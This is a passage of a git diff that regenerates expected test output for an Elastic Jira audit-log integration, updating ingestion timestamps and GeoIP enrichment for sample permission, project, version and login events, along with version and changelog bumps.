updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":223000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4868,7 +4868,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782701296Z", + "ingested": "2021-12-15T09:00:47.652702286Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Own Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":225000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4938,7 +4938,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782703645Z", + "ingested": "2021-12-15T09:00:47.652703190Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit All Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":227000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5013,7 +5013,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782705974Z", + "ingested": "2021-12-15T09:00:47.652704102Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":229000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5083,7 +5083,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782708312Z", + "ingested": "2021-12-15T09:00:47.652705022Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":231000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5158,7 +5158,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782710661Z", + "ingested": "2021-12-15T09:00:47.652705927Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Read-Only Workflow\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":233000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5228,7 +5228,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782713012Z", + "ingested": "2021-12-15T09:00:47.652706840Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Transition Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":235000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5298,7 +5298,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782715353Z", + "ingested": "2021-12-15T09:00:47.652707744Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Development Tools\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":236000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5368,7 +5368,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782717810Z", + "ingested": "2021-12-15T09:00:47.652708756Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":239000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5438,7 +5438,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782720142Z", + "ingested": "2021-12-15T09:00:47.652709665Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Start/Complete Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":241000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5508,7 +5508,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782722466Z", + "ingested": "2021-12-15T09:00:47.652710554Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":243000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5566,7 +5566,7 @@ "jira.internal" ], "ip": [ - "55.6.73.144" + "175.16.199.1" ] }, "service": { @@ -5574,27 +5574,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" + "lon": 125.3228, + "lat": 43.88 } }, - "address": "55.6.73.144", - "ip": "55.6.73.144" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "event": { "action": "jira.auditing.permission.scheme.removed.from.project", - "ingested": "2021-12-08T14:50:53.782724805Z", - "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme removed from project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"55.6.73.144\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":249000000},\"version\":\"1.0\"}", + "ingested": "2021-12-15T09:00:47.652711447Z", + "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme removed from project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":249000000},\"version\":\"1.0\"}", "type": [ "deletion" ], @@ -5662,7 +5659,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.added.to.project", - "ingested": "2021-12-08T14:50:53.782727127Z", + "ingested": "2021-12-15T09:00:47.652729117Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme added to project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.added.to.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":266000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5725,7 +5722,7 @@ }, "event": { "action": "jira.auditing.project.created", - "ingested": "2021-12-08T14:50:53.782729478Z", + "ingested": "2021-12-15T09:00:47.652730035Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"jira.auditing.project.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"test\"},{\"i18nKey\":\"common.words.key\",\"key\":\"Key\",\"to\":\"TEST\"},{\"i18nKey\":\"common.concepts.description\",\"key\":\"Description\",\"to\":\"\"},{\"i18nKey\":\"common.concepts.projectlead\",\"key\":\"Project Lead\",\"to\":\"test.user\"},{\"i18nKey\":\"admin.projects.default.assignee\",\"key\":\"Default Assignee\",\"to\":\"Unassigned\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":297000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -5819,7 +5816,7 @@ }, "event": { "action": "jira.auditing.project.roles.changed", - "ingested": "2021-12-08T14:50:53.782731825Z", + "ingested": "2021-12-15T09:00:47.652730957Z", "original": "{\"affectedObjects\":[{\"id\":\"10100\",\"name\":\"Developers\",\"type\":\"PROJECT_ROLE\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project roles changed\",\"actionI18nKey\":\"jira.auditing.project.roles.changed\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"admin.common.words.users\",\"key\":\"Users\",\"to\":\"JIRAUSER10000\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":506000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5889,7 +5886,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:53.782734154Z", + "ingested": "2021-12-15T09:00:47.652731834Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 1.0\"},{\"i18nKey\":\"version.releasedate\",\"key\":\"Release date\",\"to\":\"2021-11-14\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":521000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5952,7 +5949,7 @@ "jira.internal" ], "ip": [ - "55.6.73.144" + "175.16.199.1" ] }, "service": { @@ -5960,27 +5957,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" + "lon": 125.3228, + "lat": 43.88 } }, - "address": "55.6.73.144", - "ip": "55.6.73.144" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "event": { "action": "jira.auditing.version.released", - "ingested": "2021-12-08T14:50:53.782736517Z", - "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version released\",\"actionI18nKey\":\"jira.auditing.version.released\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"55.6.73.144\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":535000000},\"version\":\"1.0\"}", + "ingested": "2021-12-15T09:00:47.652732773Z", + "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version released\",\"actionI18nKey\":\"jira.auditing.version.released\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":535000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" }, @@ -6042,7 +6036,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:53.782738864Z", + "ingested": "2021-12-15T09:00:47.652733650Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Version 2.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 2.0\"},{\"i18nKey\":\"version.releasedate\",\"key\":\"Release date\",\"to\":\"2021-11-28\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":543000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6117,7 +6111,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:53.782741212Z", + "ingested": "2021-12-15T09:00:47.652734522Z", "original": "{\"affectedObjects\":[{\"id\":\"10002\",\"name\":\"Version 3.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 3.0\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":545000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6187,7 +6181,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:53.782743559Z", + "ingested": "2021-12-15T09:00:47.652735399Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"85\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 85\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539922,\"nano\":856000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6258,7 +6252,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-12-08T14:50:53.782745939Z", + "ingested": "2021-12-15T09:00:47.652736274Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User login failed\",\"actionI18nKey\":\"jira.auditing.user.login.failed\",\"area\":\"SECURITY\",\"category\":\"login\",\"categoryI18nKey\":\"jira.auditing.category.login\",\"level\":\"FULL\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Current number of failed login attempts\",\"nameI18nKey\":\"jira.auditing.user.login.failed.count\",\"value\":\"2\"},{\"name\":\"Reason for failed login\",\"nameI18nKey\":\"jira.auditing.user.login.failed.reason\",\"value\":\"User couldn't be authenticated\"}],\"method\":\"Browser\",\"source\":\"172.17.0.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637955310,\"nano\":718000000},\"version\":\"1.0\"}", "kind": "event", "action": "jira.auditing.user.login.failed", @@ -6334,7 +6328,7 @@ "ip": "10.100.100.2" }, "event": { - "ingested": "2021-12-08T14:50:53.782748287Z", + "ingested": "2021-12-15T09:00:47.652737145Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User login successful\",\"actionI18nKey\":\"jira.auditing.user.logged.in\",\"area\":\"SECURITY\",\"category\":\"login\",\"categoryI18nKey\":\"jira.auditing.category.login\",\"level\":\"FULL\"},\"author\":{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=admin.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637955209,\"nano\":363000000},\"version\":\"1.0\"}", "kind": "event", "action": "jira.auditing.user.logged.in", diff --git a/packages/atlassian_jira/manifest.yml b/packages/atlassian_jira/manifest.yml index 27ab2b7cf0f..87408498acb 100644 --- a/packages/atlassian_jira/manifest.yml +++ b/packages/atlassian_jira/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_jira title: Atlassian Jira -version: 1.0.0 +version: 1.0.1 license: basic description: Collect logs from Atlassian Jira with Elastic Agent. type: integration diff --git a/packages/auditd/changelog.yml b/packages/auditd/changelog.yml index d3bbba765b5..3486e3e109a 100644 --- a/packages/auditd/changelog.yml +++ b/packages/auditd/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.0" changes: - description: Change test IPs to the supported set for GeoIP diff --git 